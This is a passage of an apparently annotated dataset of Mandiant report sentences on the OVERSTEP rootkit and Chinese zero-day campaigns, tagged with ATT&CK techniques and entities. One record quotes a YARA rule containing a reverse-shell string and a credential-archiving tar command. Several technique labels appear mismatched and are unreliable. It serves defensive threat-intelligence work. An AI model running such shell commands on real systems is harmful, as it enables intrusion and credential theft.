nearly a year went by between the deployment of the wafxSummary tool Truesec wrote about, and the deployment of Abyss-branded ransomware.", "sentence_text": "This is consistent with the 6-month+ time gap between initial UNC6148 activity and the deployment of OVERSTEP in our recent investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s105-373df8", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 105, "context_before": "This is consistent with the 6-month+ time gap between initial UNC6148 activity and the deployment of OVERSTEP in our recent investigation.", "sentence_text": "Recommendations\nGTIG recommends that all organizations with SMA appliances perform analysis to determine if they have been compromised.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s106-0a399d", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 106, "context_before": "Recommendations\nGTIG recommends that all organizations with SMA appliances perform analysis to determine if they have been compromised.", "sentence_text": "Organizations should acquire disk images for forensic analysis to avoid interference from the rootkit anti-forensic capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s107-62b606", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 107, "context_before": "Organizations should acquire disk images for forensic analysis to avoid interference from the rootkit anti-forensic capabilities.", "sentence_text": "Organizations may need to engage with SonicWall to capture disk images from physical appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s108-c22617", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 108, "context_before": "Organizations may need to engage with SonicWall to capture disk images from physical appliances.", "sentence_text": "Hunting and Detection Defenders should analyze disk images and peripheral log sources for the following signs of compromise:\nFile System Artifacts Presence of any indicators of compromise (IOCs) listed in this report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s109-8254c8", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 109, "context_before": "Hunting and Detection Defenders should analyze disk images and peripheral log sources for the following signs of compromise:\nFile System Artifacts Presence of any indicators of compromise (IOCs) listed in this report.", "sentence_text": "Unexpected binaries within the persistent /cf directory or within INITRD files, especially in the /usr/lib directory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s110-0b4808", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 110, "context_before": "Unexpected binaries within the persistent /cf directory or within INITRD files, especially in the /usr/lib directory.", "sentence_text": "In our investigations, GTIG observed OVERSTEP residing in these directories.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1564.001", "name": "Hidden Files and Directories" } ], "procedure": "OVERSTEP residing in directories", "entities": [ { "text": "OVERSTEP", "start": 37, "end": 45, "label": "MalwareTool" }, { "text": " residing", "start": 45, "end": 54, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s111-324525", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 111, "context_before": "In our investigations, GTIG observed OVERSTEP residing in these directories.", "sentence_text": "Presence of the file /etc/ld.so.preload on a disk image with greater than 2 bytes of contents.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s112-9c2431", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 112, "context_before": "Presence of the file /etc/ld.so.preload on a disk image with greater than 2 bytes of contents.", "sentence_text": "This file should not exist with actual contents on a standard SMA appliance, and the rootkit will hide it from a live system.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1564.001", "name": "Hidden Files and Directories" } ], "procedure": "Hide file from live system using rootkit.", "entities": [ { "text": "rootkit", "start": 85, "end": 92, "label": "MalwareTool" }, { "text": "hide it from a live system", "start": 98, "end": 124, "label": "Action" }, { "text": "This file", "start": 0, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "SMA appliance", "start": 62, "end": 75, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s113-c1713d", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 113, "context_before": "This file should not exist with actual contents on a standard SMA appliance, and the rootkit will hide it from a live system.", "sentence_text": "Malicious modifications to RC scripts, most notably the /etc/rc.d/rc.fwboot script.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1037.004", "name": "RC Scripts" } ], "procedure": "malicious modifications to RC scripts", "entities": [ { "text": "Malicious modifications ", "start": 0, "end": 24, "label": "Action" }, { "text": "RC scripts", "start": 27, "end": 37, "label": "Infrastructure_Indicator" }, { "text": " /etc/rc.d/rc.fwboot script", "start": 55, "end": 82, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s114-d4db72", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 114, "context_before": "Malicious modifications to RC scripts, most notably the /etc/rc.d/rc.fwboot script.", "sentence_text": "Files with irregular timestamps within the INITRD image ( /cf/firmware/ ).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s115-15e901", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 115, "context_before": "Files with irregular timestamps within the INITRD image ( /cf/firmware/ ).", "sentence_text": "Log and Network Analysis Web requests to the appliance containing dobackshell or dopasswords in the URL query.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s116-2686bc", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 116, "context_before": "Log and Network Analysis Web requests to the appliance containing dobackshell or dopasswords in the URL query.", "sentence_text": "Appliance event logs showing VPN sessions from external IP addresses (especially from low-reputation networks like BLNWX) using administrator accounts.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.001", "name": "Remote Desktop Protocol" } ], "procedure": "VPN sessions from external IPs using administrator accounts", "entities": [ { "text": "VPN sessions", "start": 29, "end": 41, "label": "Infrastructure_Indicator" }, { "text": " IP addresses ", "start": 55, "end": 69, "label": "Infrastructure_Indicator" }, { "text": " administrator accounts", "start": 127, "end": 150, "label": "Infrastructure_Indicator" }, { "text": "BLNWX", "start": 115, "end": 120, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s117-3d8f6b", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 117, "context_before": "Appliance event logs showing VPN sessions from external IP addresses (especially from low-reputation networks like BLNWX) using administrator accounts.", "sentence_text": "Outbound HTTP network traffic from the appliance to external IP addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s118-3fa50e", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 118, "context_before": "Outbound HTTP network traffic from the appliance to external IP addresses.", "sentence_text": "Irregular activity or threats within other log files from the appliances, including from inside the FLASH.DAT files ( current and backup ).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s119-4c758f", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 119, "context_before": "Irregular activity or threats within other log files from the appliances, including from inside the FLASH.DAT files ( current and backup ).", "sentence_text": "Evidence of lateral movement, primarily over Secure Shell (SSH), from the SMA appliance to other systems in the environment.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.004", "name": "SSH" } ], "procedure": "lateral movement over SSH from SMA appliance", "entities": [ { "text": " Secure Shell (SSH)", "start": 44, "end": 63, "label": "Infrastructure_Indicator" }, { "text": " SMA appliance ", "start": 73, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "lateral movement", "start": 12, "end": 28, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s120-6ca62e", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 120, "context_before": "Evidence of lateral movement, primarily over Secure Shell (SSH), from the SMA appliance to other systems in the environment.", "sentence_text": "Containment and Eradication", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s121-69b6fb", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 121, "context_before": "Containment and Eradication", "sentence_text": "If evidence of compromise is detected, organizations should take immediate steps to contain the threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s122-7c2439", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 122, "context_before": "If evidence of compromise is detected, organizations should take immediate steps to contain the threat.", "sentence_text": "Isolate the affected appliance from the network to prevent further malicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s123-236e8e", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 123, "context_before": "Isolate the affected appliance from the network to prevent further malicious activity.", "sentence_text": "Preserve disk images and telemetry for a full forensic investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s124-2e9ef8", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 124, "context_before": "Preserve disk images and telemetry for a full forensic investigation.", "sentence_text": "Because the full extent of an actor's activity can be difficult to determine, GTIG recommends engaging for a thorough investigation to ensure complete scoping and eradication.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s125-80bbfb", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 125, "context_before": "Because the full extent of an actor's activity can be difficult to determine, GTIG recommends engaging for a thorough investigation to ensure complete scoping and eradication.", "sentence_text": "This is the most critical step to invalidate secrets stolen in previous compromises.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s126-c6e731", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 126, "context_before": "This is the most critical step to invalidate secrets stolen in previous compromises.", "sentence_text": "Revoke and reissue any certificates with private keys stored on the appliance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s127-b7499a", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 127, "context_before": "Revoke and reissue any certificates with private keys stored on the appliance.", "sentence_text": "Indicators of Compromise (IOCs)\nHost-Based IOCs\nNetwork-Based IOCs\nDetections\nYARA Rule\nrule G_Backdoor_OVERSTEP_1 { meta:\nauthor = \"Google Threat Intelligence Group\" date_created = \"2025-06-03\" date_modified = \"2025-06-03\" rev = 1 strings:\n$s1 = \"dobackshell\" $s2 = \"dopasswords\" $s3 = \"bash -i >& /dev/tcp/%s 0>&1 &\" $s4 = \"tar czfP /usr/src/EasyAccess/www/htdocs/%s.tgz /tmp/temp.db /etc/EasyAccess/var/conf/persist.db /etc/EasyAccess/var/cert; chmod 777\" $s5 = \"/etc/ld.so.preload\" $s6 = \"libsamba-errors.so.6\" condition:\nuint32(0)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s128-79d290", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 128, "context_before": "Indicators of Compromise (IOCs)\nHost-Based IOCs\nNetwork-Based IOCs\nDetections\nYARA Rule\nrule G_Backdoor_OVERSTEP_1 { meta:\nauthor = \"Google Threat Intelligence Group\" date_created = \"2025-06-03\" date_modified = \"2025-06-03\" rev = 1 strings:\n$s1 = \"dobackshell\" $s2 = \"dopasswords\" $s3 = \"bash -i >& /dev/tcp/%s 0>&1 &\" $s4 = \"tar czfP /usr/src/EasyAccess/www/htdocs/%s.tgz /tmp/temp.db /etc/EasyAccess/var/conf/persist.db /etc/EasyAccess/var/cert; chmod 777\" $s5 = \"/etc/ld.so.preload\" $s6 = \"libsamba-errors.so.6\" condition:\nuint32(0)", "sentence_text": "== 0x464c457f and filesize < 2MB and 4 of them } Posted in Threat Intelligence Related articles Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s129-6cfa6b", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 129, "context_before": "== 0x464c457f and filesize < 2MB and 4 of them } Posted in Threat Intelligence Related articles Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read Threat Intelligence To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER By Google Threat Intelligence Group • 12-minute read [FILTERED_TABLES_START]\n/cf/xxx.elf /cf/libsamba-errors.so.6 /usr/lib/libsamba-errors.so.6 | b28d57269fe4cd90d1650bde5e905611 6de26d211966262e59359d0e2a67d473 | OVERSTEP /etc/rc.d/rc.fwboot | f0e0db06ca665907770e2202957d3ecc d5a070acac1debaf0889d0d48c10e149 | Modified legitimate boot RC file 193.149.180.50 | Source of VPN sessions where compromise occurred (used by UNC6148 between at least May 2025 and June 2025)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s130-ad02bc", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 130, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read Threat Intelligence To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER By Google Threat Intelligence Group • 12-minute read [FILTERED_TABLES_START]\n/cf/xxx.elf /cf/libsamba-errors.so.6 /usr/lib/libsamba-errors.so.6 | b28d57269fe4cd90d1650bde5e905611 6de26d211966262e59359d0e2a67d473 | OVERSTEP /etc/rc.d/rc.fwboot | f0e0db06ca665907770e2202957d3ecc d5a070acac1debaf0889d0d48c10e149 | Modified legitimate boot RC file 193.149.180.50 | Source of VPN sessions where compromise occurred (used by UNC6148 between at least May 2025 and June 2025)", "sentence_text": "64.52.80.80 | Reverse shell IP (used by UNC6148 between at least February 2025 and June 2025)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Reverse shell to IP 64.52.80.80", "entities": [ { "text": "Reverse shell IP", "start": 14, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "UNC6148 ", "start": 40, "end": 48, "label": "ThreatActor" }, { "text": "64.52.80.80", "start": 0, "end": 11, "label": "Infrastructure_Indicator" }, { "text": "used ", "start": 32, "end": 37, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s131-1db5cf", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 131, "context_before": "64.52.80.80 | Reverse shell IP (used by UNC6148 between at least February 2025 and June 2025)", "sentence_text": "193.149.176.230 | Identified by SonicWall as triggering the OVERSTEP backdoor in July 2025 [FILTERED_TABLES_END]", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "triggering the OVERSTEP backdoor", "entities": [ { "text": "193.149.176.230", "start": 0, "end": 15, "label": "Infrastructure_Indicator" }, { "text": " triggering", "start": 44, "end": 55, "label": "Action" }, { "text": "OVERSTEP backdoor", "start": 60, "end": 77, "label": "MalwareTool" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s1-67351e", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "With a successful exploit, an attacker can achieve initial access without human interaction, decreasing chances of detection.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "achieve initial access without human interaction", "entities": [ { "text": "attacker", "start": 30, "end": 38, "label": "ThreatActor" }, { "text": "exploit", "start": 18, "end": 25, "label": "MalwareTool" }, { "text": " initial access ", "start": 50, "end": 66, "label": "Action" }, { "text": " decreasing chances of detection", "start": 92, "end": 124, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s2-7f75a8", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "With a successful exploit, an attacker can achieve initial access without human interaction, decreasing chances of detection.", "sentence_text": "As long as the exploit remains undiscovered, the threat actor can reuse it to gain access to additional victims, or reestablish access to targeted systems.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "reuse exploit to gain/reestablish access", "entities": [ { "text": " threat actor", "start": 48, "end": 61, "label": "ThreatActor" }, { "text": "exploit", "start": 15, "end": 22, "label": "MalwareTool" }, { "text": "reuse", "start": 66, "end": 71, "label": "Action" }, { "text": " reestablish access", "start": 115, "end": 134, "label": "Action" }, { "text": " targeted systems", "start": 137, "end": 154, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s3-268718", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "As long as the exploit remains undiscovered, the threat actor can reuse it to gain access to additional victims, or reestablish access to targeted systems.", "sentence_text": "Two recent campaigns exemplify notable strategies Chinese threat actors have used to maximize stealth including, but not limited to, zero-day exploitation.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1210", "name": "Exploitation of Remote Services" } ], "procedure": "zero-day exploitation for stealth", "entities": [ { "text": "Chinese threat actors ", "start": 50, "end": 72, "label": "ThreatActor" }, { "text": " zero-day exploitation", "start": 132, "end": 154, "label": "Action" }, { "text": "maximize stealth ", "start": 85, "end": 102, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s4-8452f0", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "Two recent campaigns exemplify notable strategies Chinese threat actors have used to maximize stealth including, but not limited to, zero-day exploitation.", "sentence_text": "UNC3886 Burned Two Zero-Days in Complex Ops against Hard Targets In 2022, Mandiant investigated incidents in which suspected Chinese cyber espionage actor, UNC3886, used multiple attack paths and two zero-day vulnerabilities to establish persistence at targeted organizations and ultimately gain access to virtualized environments.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1210", "name": "Exploitation of Remote Services" } ], "procedure": "used zero-day vulnerabilities to establish persistence and gain access", "entities": [ { "text": "UNC3886 ", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "UNC3886", "start": 156, "end": 163, "label": "ThreatActor" }, { "text": " Chinese cyber espionage actor", "start": 124, "end": 154, "label": "ThreatActor" }, { "text": "used", "start": 165, "end": 169, "label": "Action" }, { "text": "establish persistence", "start": 228, "end": 249, "label": "Action" }, { "text": "gain access", "start": 291, "end": 302, "label": "Action" }, { "text": " zero-day vulnerabilities", "start": 199, "end": 224, "label": "MalwareTool" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s5-d696d8", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "UNC3886 Burned Two Zero-Days in Complex Ops against Hard Targets In 2022, Mandiant investigated incidents in which suspected Chinese cyber espionage actor, UNC3886, used multiple attack paths and two zero-day vulnerabilities to establish persistence at targeted organizations and ultimately gain access to virtualized environments.", "sentence_text": "UNC3886 took extraordinary measures to remain undetected in victim environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s6-9d82f8", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "UNC3886 took extraordinary measures to remain undetected in victim environments.", "sentence_text": "The attackers limited their presence on networks to Fortinet security devices and VMware virtualization technologies, devices and platforms that traditionally lack EDR solutions.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.006", "name": "Indicator Blocking" } ], "procedure": "limited presence to devices lacking EDR", "entities": [ { "text": "attackers", "start": 4, "end": 13, "label": "ThreatActor" }, { "text": " Fortinet security devices", "start": 51, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "VMware virtualization technologies", "start": 82, "end": 116, "label": "Infrastructure_Indicator" }, { "text": " devices and platforms that traditionally lack EDR solutions", "start": 117, "end": 177, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s7-3410d2", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "The attackers limited their presence on networks to Fortinet security devices and VMware virtualization technologies, devices and platforms that traditionally lack EDR solutions.", "sentence_text": "The group’s custom malware and exploits prioritized circumventing logs and security controls, for example, using non-traditional protocols (VMCI sockets) that are not logged by default and have no security restrictions to interact between hypervisors and guest virtual machines (VMs).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "using non-traditional protocols to circumvent logging", "entities": [ { "text": "custom malware", "start": 12, "end": 26, "label": "MalwareTool" }, { "text": " exploits", "start": 30, "end": 39, "label": "MalwareTool" }, { "text": "circumventing logs and security controls", "start": 52, "end": 92, "label": "Action" }, { "text": "VMCI sockets", "start": 140, "end": 152, "label": "MalwareTool" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s8-0a669d", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "The group’s custom malware and exploits prioritized circumventing logs and security controls, for example, using non-traditional protocols (VMCI sockets) that are not logged by default and have no security restrictions to interact between hypervisors and guest virtual machines (VMs).", "sentence_text": "UNC3886 also cleared and modified logs and disabled file system verification on startup to avoid getting detected.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.002", "name": "Clear Linux or Mac System Logs" } ], "procedure": "cleared/modified logs and disabled file system verification", "entities": [ { "text": "UNC3886", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": " cleared and modified logs", "start": 12, "end": 38, "label": "Action" }, { "text": " disabled", "start": 42, "end": 51, "label": "Action" }, { "text": "avoid getting detected", "start": 91, "end": 113, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s9-f70441", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "UNC3886 also cleared and modified logs and disabled file system verification on startup to avoid getting detected.", "sentence_text": "UNC3886 took advantage of path traversal vulnerability CVE-2022-41328 to overwrite legitimate files in a normally restricted system directory (Figure 2).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1552.001", "name": "Credentials In Files" } ], "procedure": "used CVE-2022-41328 to overwrite legitimate files", "entities": [ { "text": "UNC3886", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "took advantage ", "start": 8, "end": 23, "label": "Action" }, { "text": " CVE-2022-41328 ", "start": 54, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "overwrite ", "start": 73, "end": 83, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s10-3b66a6", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "UNC3886 took advantage of path traversal vulnerability CVE-2022-41328 to overwrite legitimate files in a normally restricted system directory (Figure 2).", "sentence_text": "With access to targeted organizations’ Fortinet devices, the threat actor interacted with VMware vCenter servers and leveraged malicious vSphere Installation Bundles (“VIBs”) to install customized backdoors VIRTUALPITA and VIRTUALPIE on ESXi hypervisors.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.006", "name": "vSphere Installation Bundles" } ], "procedure": "installed backdoors VIRTUALPITA and VIRTUALPIE via malicious VIBs", "entities": [ { "text": " Fortinet devices", "start": 38, "end": 55, "label": "Infrastructure_Indicator" }, { "text": "interacted", "start": 74, "end": 84, "label": "Action" }, { "text": "threat actor ", "start": 61, "end": 74, "label": "ThreatActor" }, { "text": " VMware vCenter servers ", "start": 89, "end": 113, "label": "Infrastructure_Indicator" }, { "text": " leveraged ", "start": 116, "end": 127, "label": "Action" }, { "text": "malicious vSphere Installation Bundles (“VIBs”) ", "start": 127, "end": 175, "label": "MalwareTool" }, { "text": " install ", "start": 177, "end": 186, "label": "Action" }, { "text": " backdoors VIRTUALPITA", "start": 196, "end": 218, "label": "MalwareTool" }, { "text": "VIRTUALPIE", "start": 223, "end": 233, "label": "MalwareTool" }, { "text": "ESXi hypervisors", "start": 237, "end": 253, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s11-b32d6c", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "With access to targeted organizations’ Fortinet devices, the threat actor interacted with VMware vCenter servers and leveraged malicious vSphere Installation Bundles (“VIBs”) to install customized backdoors VIRTUALPITA and VIRTUALPIE on ESXi hypervisors.", "sentence_text": "UNC3886 exploited an authentication bypass vulnerability CVE-2023-20867 on ESXi hosts to enable the execution of privileged commands on guest VMs with no additional logs generated on guest VMs.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1211", "name": "Exploitation for Defense Evasion" } ], "procedure": "exploited CVE-2023-20867 to execute privileged commands without logging", "entities": [ { "text": "UNC3886", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": " exploited", "start": 7, "end": 17, "label": "Action" }, { "text": " CVE-2023-20867 ", "start": 56, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "ESXi hosts", "start": 75, "end": 85, "label": "Infrastructure_Indicator" }, { "text": " enable", "start": 88, "end": 95, "label": "Action" }, { "text": " execution of privileged commands", "start": 99, "end": 132, "label": "Action" }, { "text": "guest VMs", "start": 136, "end": 145, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s12-c004ff", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "UNC3886 exploited an authentication bypass vulnerability CVE-2023-20867 on ESXi hosts to enable the execution of privileged commands on guest VMs with no additional logs generated on guest VMs.", "sentence_text": "UNC4841 Exploitation of Barracuda ESG Began Stealthy, Turned Aggressive Beginning in at least October 2022, suspected Chinese cyber espionage actor UNC4841 exploited a zero-day vulnerability, CVE-2023-2868, in Barracuda Email Security Gateway (ESG) appliances in a campaign targeting public and private organizations worldwide.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploited CVE-2023-2868 in Barracuda ESG appliances", "entities": [ { "text": "UNC4841", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": " Exploitation", "start": 7, "end": 20, "label": "Action" }, { "text": " Chinese cyber espionage actor UNC4841", "start": 117, "end": 155, "label": "ThreatActor" }, { "text": "exploited", "start": 156, "end": 165, "label": "Action" }, { "text": "CVE-2023-2868", "start": 192, "end": 205, "label": "Infrastructure_Indicator" }, { "text": " targeting ", "start": 273, "end": 284, "label": "Action" }, { "text": " Barracuda Email Security Gateway (ESG) appliances", "start": 209, "end": 259, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s13-74552b", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "UNC4841 Exploitation of Barracuda ESG Began Stealthy, Turned Aggressive Beginning in at least October 2022, suspected Chinese cyber espionage actor UNC4841 exploited a zero-day vulnerability, CVE-2023-2868, in Barracuda Email Security Gateway (ESG) appliances in a campaign targeting public and private organizations worldwide.", "sentence_text": "In several cases we observed evidence of the actor searching for email data of interest before staging it for exfiltration.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1114.002", "name": "Remote Email Collection" } ], "procedure": "searching for and staging email data for exfiltration", "entities": [ { "text": "the actor ", "start": 41, "end": 51, "label": "ThreatActor" }, { "text": "searching ", "start": 51, "end": 61, "label": "Action" }, { "text": "email data", "start": 65, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "exfiltration", "start": 110, "end": 122, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s14-1a24fd", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 14, 